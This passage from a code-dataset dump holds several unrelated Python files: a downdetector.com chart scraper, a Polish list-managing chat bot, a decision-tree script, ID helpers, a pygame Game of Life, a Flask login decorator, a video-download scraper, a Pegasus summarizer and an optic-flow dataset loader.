problems\"\n\n\nclass DownDetector:\n \"\"\"\n A helper class for interacting with and scraping the downdetector.com website\n \"\"\"\n\n def __init__(self, output_dir=\"plugins/lib/common/tmp\", chart_wait=2, ads_wait=2):\n \"\"\"\n Initializes the DownDetector class\n :param output_dir: the directory to save the downloaded charts to\n :param chart_wait: the amount of time to wait for the chart to load\n :param ads_wait: the amount of time to wait for the ads to load\n \"\"\"\n self.output_dir = output_dir\n self.bad_characters = '\\\\/;*?\"<>$#@!|[}]{=^%'\n self.chart_wait = chart_wait\n self.ads_wait = ads_wait\n\n def chart(self, service, search=False):\n \"\"\"\n Gets the chart of a service from downdetector.com\n :param service: the service to get the chart for (e.g. \"escape-from-tarkov\")\n :param search: Defaults to False, set to True if you want to attempt to search for a service rather than an exact match on a service name - (e.g. \"escape from tarkav\" - with a typo)\n :return file_name: the path to the downloaded chart (String) - False if anything fails\n :return status: best effort guess of the status of the service (String)\n\n Note: The service can be found in the url after /status/ -> https://downdetector.com/status/escape-from-tarkov/\n\n Note: If the 'search' flag is set to True, the service will be searched for rather than a straight up GET call. 
If you can use the exact service name, it is recommended\n \"\"\"\n\n try:\n display = Display(visible=0, size=(1920, 1080))\n display.start()\n\n options = Options()\n options.add_argument(\"--no-sandbox\")\n options.add_argument(\"--headless\")\n options.add_argument(\"log-level=3\")\n options.add_argument(\"--disable-gpu\")\n options.add_argument(\"--disable-dev-shm-usage\")\n options.add_argument(\"--window-size=1920,1080\")\n options.add_argument(\n \"user-agent=Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36\"\n )\n\n # Initializing webdriver for Chrome with our options\n driver = webdriver.Chrome(options=options)\n\n # If the search flag was provided, we search for the service in DownDetector\n if search:\n driver.get(\n f\"https://downdetector.com/search/?q={service.replace(' ', '+')}\"\n )\n\n # If the search flag was not provided, we attempt to go directly to the service page\n else:\n driver.get(f\"https://downdetector.com/status/{service}/\")\n\n try:\n # If we used the search flag, check the page to ensure a result was found\n if search:\n # check the search input\n if self.bad_input(service):\n # close browser\n driver.close()\n driver.quit()\n display.stop()\n return False, f\"❌ Bad search string: `{service}`\"\n\n # If the search returned no results, return None\n # dev note: the /search/ url stays if no results are found\n if \"/search/?q=\" in driver.current_url:\n return None, None\n\n # Wait for the chart to load\n WebDriverWait(driver, self.chart_wait).until(\n EC.presence_of_element_located((By.ID, \"chart-row\"))\n )\n except TimeoutException:\n # If the chart did not load, we have to exit\n return False, False\n\n # Wait for the ads banner to load and delete it if it does\n # NOTE: This is a hacky way to do this, but it works for now\n # If the element ID of the ads banner at the top of the DownDetector page changes, this will break\n # If the ads banner is not present, this should timeout and continue as usual\n try:\n # Wait for ads banner to load by looking for the element ID\n WebDriverWait(driver, self.ads_wait).until(\n EC.presence_of_element_located((By.ID, \"ad-leaderboard\"))\n )\n # If the ads banner is present, delete it so that we can capture a proper chart screenshot\n js_string = 'var element = document.getElementById(\"ad-leaderboard\");element.remove();'\n driver.execute_script(js_string)\n except TimeoutException:\n pass\n\n # Get the chart element\n chart_elem = driver.find_element(\n By.XPATH, \"//body/div[3]/div[2]/div[1]/div[2]/div[1]\"\n )\n\n # Get the sizes of the chart for cropping\n location = chart_elem.location\n size = chart_elem.size\n x = location[\"x\"]\n y = location[\"y\"]\n h = location[\"y\"] + size[\"height\"]\n w = location[\"x\"] + size[\"width\"]\n\n # Save the chart screenshot to memory\n p = driver.get_screenshot_as_png()\n\n # Open the captured image to crop it\n img_open = Image.open(BytesIO(p))\n\n # Crop the image\n img_crop = img_open.crop((x, y, w, h))\n\n # Save the cropped image\n # Example url https://downdetector.com/status/escape-from-tarkov/\n file_name = f\"{self.output_dir}/{service}-{uuid.uuid4()}.png\"\n img_crop.save(file_name)\n\n try:\n # Make a best effort attempt to get the status of the service from the page header\n page_header = driver.find_element(\n By.XPATH,\n \"/html[1]/body[1]/div[3]/div[2]/div[1]/div[1]/div[1]/div[1]\",\n )\n # Get the header text\n page_header_text = page_header.text.strip().lower()\n\n # Get and format the 
service name from the URL\n service_name = (\n driver.current_url.split(\"/status/\")[-1]\n .replace(\"-\", \" \")\n .replace(\"/\", \"\")\n )\n\n # Set the status based on the text of the header page\n if OK in page_header_text:\n status = f\"🟢 User reports do not indicate problems for **{service_name}**\"\n elif DOWN in page_header_text:\n status = f\"🔴 User reports indicate problems for **{service_name}**\"\n elif WARNING in page_header_text:\n status = f\"🟡 User reports indicate possible problems for **{service_name}**\"\n else:\n # unknown status, maybe DownDetector changed their page layout\n status = f\"❓ The status of **{service_name}** is unknown due to a processing error\"\n except:\n status = f\"❓ The status of **{service_name}** is unknown due to a processing error\"\n\n # close browser\n driver.close()\n driver.quit()\n display.stop()\n\n return file_name, status\n\n except Exception as error:\n ErrHelper().capture(error)\n\n # close browser in the case of an error\n driver.close()\n driver.quit()\n display.stop()\n\n return False, \"❌ A critical error occurred while trying to get the chart\"\n\n def bad_input(self, data):\n \"\"\"\n Helper function to check if provided data is 'bad'\n Bad could be data that is not a valid search string or malicious\n :param data: data to check (String)\n :return bool: true if bad data - false otherwise\n \"\"\"\n # If the provided input is a URL, it is bad\n if validators.url(data):\n return True\n\n # Check against our 'bad_characters' list\n for sub_string in self.bad_characters:\n if sub_string in data:\n # If a 'bad character' is found, return true\n return True\n\n # Add more check here...\n\n return False\n","repo_name":"GrantBirki/errbot","sub_path":"src/errbot/plugins/lib/common/down_detector.py","file_name":"down_detector.py","file_ext":"py","file_size_in_byte":8821,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"37"} +{"seq_id":"27686435831","text":"import os\n\n\ndef make_user_database(p):\n path = (str(p)[:5])\n print(path)\n is_exist = os.path.exists(\"data/\"+path)\n print(is_exist)\n if is_exist:\n message = \"Masz już swoją bazę, nie mogę utworzyć drugiej!\"\n if not is_exist:\n os.makedirs(\"data/\"+path)\n message = \"Utworzyłem dla Ciebie własną bazę - możesz tworzyć już swoje listy!\"\n return message\n\n\ndef check_user_database(p):\n path = (str(p)[:5])\n is_exist = os.path.exists(\"data/\" + path)\n if not is_exist:\n message = \"Nie widzę Twojej bazy - przed działaniem musisz ją utworzyć komendą .make_base\"\n return message\n if is_exist:\n return path\n\n\ndef checklist(dire, p):\n if p is None:\n p = 'main'\n print(p.isalnum())\n if p.isalnum() is False:\n message = \"Nie ma takiej listy - podano znaki niealfanumeryczne!\"\n code = 2\n return [message, code]\n p = p.lower()\n is_exist = os.path.exists(\"data/\"+dire+'/'+p+'.txt')\n if not is_exist:\n message = \"Nie ma takiej listy - musisz ją utworzyć komendą .add_list\"\n code = 1\n else:\n message = \"Widzę taką listę - zabieram się do działania!\"\n code = 0\n return [message, code]\n\n\ndef add_list(dire, p):\n a = checklist(dire, p)[1]\n if a == 2:\n message = checklist(dire, p)[0]\n return message\n if a == 0:\n message = \"Taka lista już istnieje - nadpisz ją używając odpowiedniej komendy!\"\n return message\n else:\n print(\"Type of dire:\"+str(type(dire)))\n print(\"Type of p:\" + str(type(p)))\n if p is None:\n p = \"main\"\n with open(\"data/\"+dire+\"/\"+p+'.txt', 'a') as f1:\n f1.write('p\\n')\n 
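# the lone 'p' line appears to act as a placeholder marking a freshly created, still-empty list;\n            # add_to_list and the main.txt check below look for that sentinel to decide between overwrite and append\n            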
f1.close()\n with open(\"data/\" + dire + \"/main.txt\", 'r') as f2:\n line1 = f2.readline()\n f2.close()\n print(line1)\n message = \"Nie znalazłem takiej listy więc już ją tworzę!\"\n if line1 == 'p\\n':\n with open(\"data/\" + dire + \"/main.txt\", 'w') as f2:\n if p == \"main\":\n pass\n else:\n f2.write(p + '\\n')\n f2.close()\n else:\n with open(\"data/\"+dire+\"/main.txt\", 'a') as f2:\n if p == \"main\":\n pass\n else:\n f2.write(p+'\\n')\n f2.close()\n return message\n\n\ndef copy_list(dire, p, c):\n if p is None or c is None:\n message = \"Nie podano mi wystarczająco argumentów!\"\n return message\n a = checklist(dire, p)[1]\n z = checklist(dire, c)[1]\n if a == 2 or z == 2:\n message = checklist(dire, p)[0]\n return message\n if z == 0:\n message = \"Lista podana jako nowa nazwa już istnieje jako lista!\"\n return message\n if a == 0:\n with open(\"data/\"+dire+\"/\"+p+'.txt', 'r') as f1:\n lines1 = f1.readlines()\n f1.close()\n with open(\"data/\"+dire+\"/\"+c+'.txt', 'a') as f2:\n for i in lines1:\n f2.write(i)\n f2.close()\n message = \"Skopiowałem listę \"+p+\" do \"+c+\"!\"\n return message\n else:\n message = \"Nie mogę skopiować listy która nie istnieje!\"\n return message\n\n\ndef remove_list(dire, p):\n if p is None:\n message = \"Nie podano mi którą listę usunąć!\"\n return message\n a = checklist(dire, p)[1]\n if a == 2:\n message = checklist(dire, p)[0]\n return message\n if a == 0:\n os.remove(\"data/\"+dire+\"/\"+p+'.txt')\n message = \"Usunąłem listę \"+p+\"!\"\n with open(\"data/\" + dire + \"/main.txt\", 'r') as f1:\n lines1 = f1.readlines()\n f1.close()\n with open(\"data/\" + dire + \"/main.txt\", 'w') as f2:\n for index, title in enumerate(lines1, start=1):\n if title != p+\"\\n\":\n f2.write(title)\n f2.close()\n else:\n message = \"Nie ma takiej listy!\"\n return message\n\n\ndef get_list(name):\n with open(name + '.txt') as f1:\n lines1 = f1.readlines()\n f1.close()\n return lines1\n\n\ndef parse_multiple_into_one(amount, li):\n onemes = \"List:\\n\"\n for i in range(amount):\n if i > 9:\n onemes += (str(i + 1) + \". \" + li[i])\n else:\n onemes += (str(i + 1) + \". 
\" + li[i])\n return onemes\n\n\ndef add_to_list(name, addon):\n name = name.lower()\n with open(name + '.txt') as f1:\n lines1 = f1.readlines()\n f1.close()\n if lines1[0] == \"p\\n\":\n with open(name + '.txt', 'w') as f1:\n f1.write(addon+'\\n')\n f1.close()\n else:\n with open(name + '.txt', 'a') as f1:\n f1.write(addon+'\\n')\n f1.close()\n\n\ndef remove_from_list(name, line):\n name = name.lower()\n with open(name + '.txt') as f1:\n lines1 = f1.readlines()\n print(len(lines1))\n f1.close()\n if int(line) > len(lines1):\n message = \"Lista ma tylko \"+str(len(lines1))+\" wpisów!\"\n return message\n with open(name + '.txt', 'w') as f2:\n for index, title in enumerate(lines1, start=1):\n if index != int(line):\n f2.write(title)\n f2.close()\n message = \"Usunięto wpis!\"\n return message\n","repo_name":"Sedarius-1/Wahabot","sub_path":"fad.py","file_name":"fad.py","file_ext":"py","file_size_in_byte":5271,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"16758367422","text":"#-*- coding: utf-8 -*-\n#构建并测试CART决策树模型\n\nimport pandas as pd #导入数据分析库\n\n\nquchu = u'F:/data/去除第一次样本集.csv'\nzengrong = u'F:/data/1.csv'\njianrong = u'F:/data/2.csv'\njianronghuifu = u'F:/data/3.csv'\nzanting = u'F:/data/4.csv'\nzantinghuifu = u'F:/data/5.csv'\ndata = pd.read_csv(zanting,encoding='gbk') #读取数据,数据的前三列是特征,第四列是标签\ndeal = {u'年初':1,u'年中':2,u'年末':3}\ndata[u'阶段'] = data[u'阶段'].map(lambda x : deal[x])\ntrain = data[data[u'申请执行月'] < 201602][u'是否容量变更']\ntest = data[data[u'申请执行月'] > 201602][u'是否容量变更']\ntest = test.tolist()\ntrain = train.tolist()\n# data = (data - data.mean(axis=0)) / (data.std(axis=0))\ntrain_data = data[data[u'申请执行月'] < 201602]\ntest_data = data[data[u'申请执行月'] > 201602]\ndel train_data[u'申请执行月']\ndel test_data[u'申请执行月']\ntrain_data = train_data.as_matrix()\ntest_data = test_data.as_matrix()\ntrain_data = (train_data - train_data.mean(axis=0)) / (train_data.std(axis=0))\ntest_data = (test_data - test_data.mean(axis=0)) / (test_data.std(axis=0))\n\n\n#构建CART决策树模型\nfrom sklearn.tree import DecisionTreeClassifier #导入决策树模型\n\ntree = DecisionTreeClassifier() #建立决策树模型\ntree.fit(train_data[:,:2], train) #训练\n\n#保存模型\n# from sklearn.externals import joblib\n# joblib.dump(tree, treefile)\n\nfrom prediction.cm_plot import * #导入自行编写的混淆矩阵可视化函数\ncm_plot(test, tree.predict(test_data[:,:2])).show() #显示混淆矩阵可视化结果\n#注意到Scikit-Learn使用predict方法直接给出预测结果。\n\nfrom sklearn.metrics import roc_curve #导入ROC曲线函数\nimport matplotlib.pyplot as plt\nfpr, tpr, thresholds = roc_curve(test, tree.predict_proba(test_data[:,:2])[:,1], pos_label=1)\nplt.plot(fpr, tpr, linewidth=2, label = 'ROC of CART', color = 'green') #作出ROC曲线\nplt.xlabel('False Positive Rate') #坐标轴标签\nplt.ylabel('True Positive Rate') #坐标轴标签\nplt.ylim(0,1.05) #边界范围\nplt.xlim(0,1.05) #边界范围\nplt.legend(loc=4) #图例\nplt.show() #显示作图结果","repo_name":"braveld/PythonProgram","sub_path":"after_classified/decision_tree_yongdian.py","file_name":"decision_tree_yongdian.py","file_ext":"py","file_size_in_byte":2170,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"14731021857","text":"import hashlib\nimport random\nimport string\nimport time\nimport uuid\n\n\ndef gen_uuid():\n return str(uuid.uuid1())\n\n\ndef gen_id(node_type=''):\n if node_type == 'UNKNOWN':\n return None\n\n s = ''.join(random.sample(string.ascii_lowercase, 10))\n t = ''.join([s, random_date(), gen_uuid()])\n m = hashlib.md5()\n m.update(bytes(str(t)))\n ran_id = m.hexdigest()\n return 
''.join([node_type, ran_id])\n\n\ndef random_date():\n    a1 = (2000, 1, 1, 0, 0, 0, 0, 0, 0)\n    a2 = (2018, 12, 31, 23, 59, 59, 0, 0, 0)\n\n    start = time.mktime(a1)\n    end = time.mktime(a2)\n\n    t = random.randint(start, end)\n    date_tuple = time.localtime(t)\n    date = time.strftime(\"%Y-%m-%d\", date_tuple)\n    return date\n\n\ndef random_int():\n    return random.randint(10000, 10000000)\n\n\ndef random_index(rate):\n    start = 0\n    index = 0\n    rand_num = random.randint(1, sum(rate))\n\n    for index, scope in enumerate(rate):\n        start += scope\n        if rand_num <= start:\n            break\n    return index\n","repo_name":"jimxiang/knowledgemap","sub_path":"guarantee_relation/util/tools.py","file_name":"tools.py","file_ext":"py","file_size_in_byte":1006,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36059604305","text":"import pygame\nimport sys\nimport time\n\nfrom game import step\nfrom game import print_grid\nfrom game import insert_life\nfrom game import BASE\nfrom game import create_grid\nfrom game import ALIVE, DEAD\n\n\nclass Rectangle(pygame.sprite.Sprite):\n    def __init__(self, pos_x, pos_y):\n        super().__init__()\n        self.image = pygame.Surface([100, 100])\n        self.image.fill((0, 0, 0))\n        self.rect = self.image.get_rect()\n        self.rect.topleft = [pos_x, pos_y]\n\n\n# Grid Setup\ngrid = create_grid()\nl1 = [15, 26, 34, 35, 36]\ninsert_life(grid, l1)\n# grid = play(grid)\nprint_grid(grid, BASE)\n\n# General Setup\npygame.init()\nclock = pygame.time.Clock()\n\n# Game Screen\nscreen_width = 1000\nscreen_height = 1000\nscreen = pygame.display.set_mode((screen_width, screen_height))\npygame.display.set_caption(\"Sprite Animation\")\n\n# Creating the sprites and groups\nmoving_sprites = pygame.sprite.Group()\n\n\ndef pygame_step(grid, moving_sprites):\n    moving_sprites.empty()\n    for i in range(100):\n        if grid[i] == ALIVE:\n            j = i % BASE\n            rectangle_tmp = Rectangle(j * BASE * BASE, (i-j) * BASE)\n            moving_sprites.add(rectangle_tmp)\n            print(i)\n            print(j, \" \", i-j)\n            print()\n\n\n# mainloop\n\"\"\"i = 0\nj = 0\"\"\"\nwhile True:\n    for event in pygame.event.get():\n        if event.type == pygame.QUIT:\n            pygame.quit()\n            sys.exit()\n\n    \"\"\"rectangle1.rect.topleft = [i, j*10]\n    i += 1\n    if i % 1000 == 0:\n        i = 0\n        j += 1\n    print(i)\"\"\"\n\n    pygame_step(grid, moving_sprites)\n    grid = step(grid)\n\n    screen.fill((0, 255, 255))\n    moving_sprites.draw(screen)\n    pygame.display.flip()\n\n    # clock.tick(1000000)\n    time.sleep(0.5)","repo_name":"lilAndy-bruh/Game_of_Life","sub_path":"pygame_intro.py","file_name":"pygame_intro.py","file_ext":"py","file_size_in_byte":1718,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"33035751096","text":"# Define the index-conversion filter (if the filter were defined via a decorator, current_app would have to be used for registration here and the decorator would also have to be declared in the init file, which is comparatively cumbersome)\nimport functools\n\nfrom flask import session, current_app, g\n\nfrom Info.models import User\n\n\ndef index_convert(index):\n    index_dict = {\n        1: \"first\",\n        2: \"second\",\n        3: \"third\"\n    }\n    return index_dict.get(index, \"\")\n\n\n\n# query the user's login status\ndef user_login_data(f):\n    @functools.wraps(f)  # lets the closure wrapper carry the metadata of the wrapped function f (e.g. its __name__ and __doc__)\n    def wrapper(*args, **kwargs):\n        # check whether the user is logged in\n        user_id = session.get(\"user_id\")\n        user = None  # in some edge cases user_id has no value and nothing can be fetched from the database, but the template still needs a value to render, so initialize user here\n        if user_id:\n            # look up the user model by user_id\n            try:\n                user = User.query.get(user_id)\n            except Exception as e:\n                current_app.logger.error(e)\n\n        # user = user.to_dict() if user else None  # this is only used to verify login state, so there is no need to format the user's fields\n\n        
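# stash the user on flask.g so the wrapped view (and any template rendered during this request) can read it without re-querying\n        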
g.user = user  # record the queried user data on the g variable\n\n        # then run the original view\n        return f(*args, **kwargs)\n\n    return wrapper\n","repo_name":"CcLmL/InfoNews","sub_path":"Info/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":1422,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73613993707","text":"from bs4 import BeautifulSoup\nimport re\nfrom urllib.request import Request, urlopen\nimport youtube_dl\n\ndef getWSHlinks(page):\n    req = Request(page, headers={'User-Agent': 'Mozilla/5.0'})\n    html_page = urlopen(req).read()\n\n    soup = BeautifulSoup(html_page, 'html.parser')\n\n    soup.body.find_all(\"time\")\n\n\n    results = soup.find_all('a', attrs={\"class\":\"video-box\"})\n\n    hrefs = []\n    for x in results:\n        #print(x.get('href'))\n        hrefs.append(x.get('href'))\n    return hrefs\n\nweekLongVidRefs = getWSHlinks(\"https://worldstarhiphop.com/videos/\")\nweekLongVidRefs.extend(getWSHlinks(\"https://worldstarhiphop.com/videos/?start=2\"))\n\nydl_opts = {}\nwith youtube_dl.YoutubeDL(ydl_opts) as ydl:\n    ydl.download(weekLongVidRefs)\nprint(len(weekLongVidRefs))\n","repo_name":"human3rr/scrape","sub_path":"scrape.py","file_name":"scrape.py","file_ext":"py","file_size_in_byte":768,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"2469821788","text":"\"\"\"\nGiven an integer n, for every i with 0 <= i <= n, count the number of 1s in the binary representation of i, and return an array ans of length n + 1 as the answer.\n\neg1:\nInput: n = 2\nOutput: [0,1,1]\nExplanation:\n0 --> 0\n1 --> 1\n2 --> 10\n\neg2:\nInput: n = 5\nOutput: [0,1,1,2,1,2]\nExplanation:\n0 --> 0\n1 --> 1\n2 --> 10\n3 --> 11\n4 --> 100\n5 --> 101\n\n\"\"\"\nfrom typing import Optional, List\n\n\nclass Solution:\n    def countBits(self, n: int) -> List[int]:\n        bits = [0]\n        high_bit = 0\n        for i in range(1, n + 1):\n            # if i is a power of two (a single 1 bit), update high_bit\n            if i & (i - 1) == 0:\n                high_bit = i\n            # i has exactly one more 1 bit than i - high_bit\n            bits.append(bits[i - high_bit] + 1)\n        return bits\n\n\nif __name__ == '__main__':\n    solution = Solution()\n    print(solution.countBits(5))\n","repo_name":"TQQ615/leetcode","sub_path":"数组及其他/比特位计数.py","file_name":"比特位计数.py","file_ext":"py","file_size_in_byte":840,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"18868997744","text":"# imports\nimport json\nfrom transformers import PegasusForConditionalGeneration, PegasusTokenizer\nfrom argparse import ArgumentParser\nimport pytorch_lightning as pl\nimport torch\n\n\nclass PegasusLightning(pl.LightningModule):\n    # Instantiate the model (the tokenizer is kept so save_model can persist it too)\n    def __init__(self, model, tokenizer=None):\n        super().__init__()\n        self.model = model\n        self.tokenizer = tokenizer\n\n    # Do a forward pass through the model\n    def forward(self, input_ids, **kwargs):\n        return self.model(input_ids, **kwargs)\n\n    def generate(self, text, eval_beams, early_stopping=True, max_len=64):\n        ''' Function to generate text '''\n        generated_ids = self.model.generate(\n            text[\"input_ids\"],\n            attention_mask=text[\"attention_mask\"],\n            use_cache=True,\n            num_beams=eval_beams,\n            max_length=max_len,\n            early_stopping=early_stopping,\n\n        )\n        return generated_ids\n\n    def save_model(self, save_path):\n        self.tokenizer.save_pretrained(save_path)\n        self.model.save_pretrained(save_path)\n\n# -----------------------------------------------------------------------------------\n\n\ndef generate_(text, model_, tokenizer_):\n    # Put the model in eval mode\n\n    tokens = tokenizer_(text, padding='max_length',\n                        return_tensors=\"pt\", truncation=True, src_lang=\"de_DE\").to(\"cuda\")\n    summary_ids = model_.generate(\n        tokens, eval_beams=4)\n    with 
tokenizer_.as_target_tokenizer():\n        output = ([tokenizer_.decode(g, skip_special_tokens=True,\n                                     clean_up_tokenization_spaces=True, tgt_lang=\"de_DE\") for g in summary_ids])\n    return output[0]\n\n\ndef summarize(text, model, tokenizer):\n    output = generate_(text, model_=model, tokenizer_=tokenizer)\n    return output\n\n\ndef array_to_string(array):\n    text = \"\"\n    for ele in array:\n        text += ele + \" \"\n    text = text.replace(\"\\n\", \"\").replace(\"\\r\", \"\")\n    return text\n\n\ndef run(checkpoint_path, test_file, output_file, model_id):\n    device = \"cuda\" if torch.cuda.is_available() else \"cpu\"\n    print(f\"Device is set to {device}\")\n\n    tokenizer = PegasusTokenizer.from_pretrained(\n        model_id)\n\n    pegasus_model = PegasusForConditionalGeneration.from_pretrained(\n        model_id)\n\n    model = PegasusLightning.load_from_checkpoint(\n        checkpoint_path=checkpoint_path, strict=False, tokenizer=tokenizer, model=pegasus_model)\n\n    model.to(torch.device(device))  # use the detected device instead of hard-coding cuda\n    model.eval()\n\n    print(\"Starting GENERATION\")\n\n    # ---------Variable to be set:\n    file_path = test_file\n    output_file_path = output_file\n    # --------------------------\n    file = open(file_path, \"r\", encoding=\"utf-8\")\n    output = open(output_file_path, \"a\", encoding=\"utf-8\")\n    lines = file.readlines()\n    for i in range(len(lines)):\n        data = json.loads(lines[i])\n        result = summarize(array_to_string(\n            data[\"source\"]), model=model, tokenizer=tokenizer)\n        print(str(result))\n        output.write(str(result) + \" \\n\")\n        print(f\"Processed TLDR #{i} from total {len(lines)} TLDRs\")\n    output.close()\n    file.close()\n\n\nif __name__ == \"__main__\":\n    parser = ArgumentParser()\n    # Required parameters\n    parser.add_argument(\"--checkpoint_path\", type=str,\n                        help=\"Path of the checkpoint file to be used.\")\n    parser.add_argument(\"--test_file\", type=str,\n                        help=\"Path to the test file containing the documents.\")\n    parser.add_argument(\"--output_file\", type=str,\n                        help=\"File to save generated summaries in.\")\n    parser.add_argument(\"--model-id\", type=str, required=False, default=\"google/pegasus-large\",\n                        help=\"Exact PEGASUS model checkpoint from huggingface to initialize the model.\")\n\n    args = parser.parse_args()\n    run(args.checkpoint_path, args.test_file,\n        args.output_file, args.model_id)\n","repo_name":"nfriedri/CLS-Platform","sub_path":"backend/scripts/pegasus_lightning_model.py","file_name":"pegasus_lightning_model.py","file_ext":"py","file_size_in_byte":3878,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"}
{"seq_id":"4132645126","text":"from .utils_model import *\nfrom torch.utils.data.dataset import Dataset\nfrom analysis.opticflow import ROFL, HyperFlow\n\n\n# noinspection PyUnresolvedReferences\nclass ROFLDS(Dataset):\n\tdef __init__(\n\t\t\tself,\n\t\t\tpath: str,\n\t\t\tmode: str,\n\t\t\tdevice: torch.device = None,\n\t):\n\t\t# category & n_obj\n\t\tsim = path.split('/')[-1].split('_')[0]\n\t\tself.category = sim[:-1]\n\t\tself.n_obj = int(sim[-1])\n\t\t# attributes\n\t\tself.attrs = np.load(\n\t\t\tpjoin(path, 'attrs.npy'),\n\t\t\tallow_pickle=True,\n\t\t).item()\n\t\tself.f = self.attrs.pop('f')\n\t\tself.f_aux = self.attrs.pop('f_aux')\n\t\t# mode = trn/vld/tst\n\t\tpath = pjoin(path, mode)\n\t\tkws = dict(mmap_mode='r')\n\t\t# generative factors\n\t\tself.g = np.load(pjoin(path, 'g.npy'), **kws)\n\t\tself.g_aux = np.load(pjoin(path, 'g_aux.npy'), **kws)\n\t\t# data & norm\n\t\tself.x = np.load(pjoin(path, 'x.npy'), **kws)\n\t\tself.norm = np.load(pjoin(path, 'norm.npy'), 
**kws)\n\t\tif device is not None:\n\t\t\tself.x = torch.tensor(\n\t\t\t\tdata=self.x,\n\t\t\t\tdevice=device,\n\t\t\t\tdtype=torch.float,\n\t\t\t)\n\t\t\tself.norm = torch.tensor(\n\t\t\t\tdata=self.norm,\n\t\t\t\tdevice=device,\n\t\t\t\tdtype=torch.float,\n\t\t\t)\n\t\tif self.category == 'obj':\n\t\t\tself.transform = _shift_mu\n\t\telse:\n\t\t\tself.transform = None\n\n\tdef __len__(self):\n\t\treturn len(self.x)\n\n\tdef __getitem__(self, i):\n\t\tif self.transform is not None:\n\t\t\tx = self.transform(self.x[i])\n\t\telse:\n\t\t\tx = self.x[i]\n\t\treturn x, self.norm[i]\n\n\ndef _shift_mu(x):\n\treturn x - torch.mean(x)\n\n\ndef generate_simulation(\n\t\tcategory: str,\n\t\tn_obj: int,\n\t\ttotal: int,\n\t\tkwargs: dict,\n\t\taccept_n: dict,\n\t\tmin_obj_size: int,\n\t\tdtype='float32', ):\n\tkws = kwargs.copy()\n\tkws['category'] = category\n\tkws['n_obj'] = n_obj\n\tkws['seed'] = 0\n\n\tshape = (total, kws['dim'], kws['dim'], 2)\n\talpha_dot = np.empty(shape, dtype=dtype)\n\tg_all, g_aux_all = [], []\n\n\tcnt = 0\n\twhile True:\n\t\t# generate\n\t\tof = ROFL(**kws).compute_coords()\n\t\t_ = of.compute_flow()\n\t\t# accept\n\t\taccept = of.filter(\n\t\t\tmin_obj_size=min_obj_size,\n\t\t\tmin_n_obj=accept_n[n_obj],\n\t\t)\n\t\tf, g, f_aux, g_aux = of.groundtruth_factors()\n\t\tind = range(cnt, min(cnt + accept.sum(), total))\n\t\talpha_dot[ind] = of.alpha_dot[accept][:len(ind)].astype(dtype)\n\t\tg_aux_all.append(g_aux[accept])\n\t\tg_all.append(g[accept])\n\t\tcnt += accept.sum()\n\t\tif cnt >= total:\n\t\t\tbreak\n\t\tkws['seed'] += 1\n\n\talpha_dot = np.transpose(alpha_dot, (0, -1, 1, 2))\n\tg_all, g_aux_all = cat_map([g_all, g_aux_all], axis=0)\n\tg_all, g_aux_all = g_all[:, :total], g_aux_all[:, :total]\n\n\tattrs = {\n\t\t'f': f,\n\t\t'f_aux': f_aux,\n\t\t'category': of.category,\n\t\t'n_obj': of.n_obj,\n\t\t'dim': of.dim,\n\t\t'fov': of.fov,\n\t\t'res': of.res,\n\t\t'z_bg': of.z_bg,\n\t\t'obj_r': of.obj_r,\n\t\t'obj_bound': of.obj_bound,\n\t\t'obj_zlim': of.obj_zlim,\n\t\t'vlim_obj': of.vlim_obj,\n\t\t'vlim_slf': of.vlim_slf,\n\t\t'residual': of.residual,\n\t\t'seeds': range(kws['seed'] + 1),\n\t}\n\treturn alpha_dot, g_all, g_aux_all, attrs\n\n\ndef save_simulation(\n\t\tsave_dir: str,\n\t\tx: np.ndarray,\n\t\tg: np.ndarray,\n\t\tg_aux: np.ndarray,\n\t\tattrs: dict,\n\t\tsplit: dict = None, ):\n\tn = len(x)\n\tname = '_'.join([\n\t\tf\"{attrs['category']}{attrs['n_obj']}\",\n\t\tf\"dim-{attrs['dim']}\",\n\t\tf\"n-{n//1000}k\",\n\t])\n\tpath = pjoin(save_dir, name)\n\tos.makedirs(path, exist_ok=True)\n\t# save attrs\n\tsave_obj(\n\t\tobj=attrs,\n\t\tsave_dir=path,\n\t\tfile_name='attrs',\n\t\tverbose=False,\n\t\tmode='npy',\n\t)\n\t# save data\n\tsplit = split if split else {\n\t\t'trn': int(0.8 * n),\n\t\t'vld': int(0.1 * n),\n\t\t'tst': int(0.1 * n),\n\t}\n\tassert sum(split.values()) == n\n\ti = 0\n\tsplit_ids = {}\n\tfor k, v in split.items():\n\t\tsplit_ids[k] = range(i, i + v)\n\t\ti += v\n\tfor a, b in itertools.combinations(split_ids.values(), 2):\n\t\tassert not set(a).intersection(b)\n\n\tfor lbl, ids in split_ids.items():\n\t\t_path = pjoin(path, lbl)\n\t\tos.makedirs(_path, exist_ok=True)\n\t\tkws = dict(\n\t\t\tsave_dir=_path,\n\t\t\tverbose=False,\n\t\t\tmode='npy',\n\t\t)\n\t\t# generative factors\n\t\tkws['obj'] = g[ids]\n\t\tkws['file_name'] = 'g'\n\t\tsave_obj(**kws)\n\t\t# generative factors (aux)\n\t\tkws['obj'] = g_aux[ids]\n\t\tkws['file_name'] = 'g_aux'\n\t\tsave_obj(**kws)\n\t\t# flow frames\n\t\tkws['obj'] = x[ids]\n\t\tkws['file_name'] = 
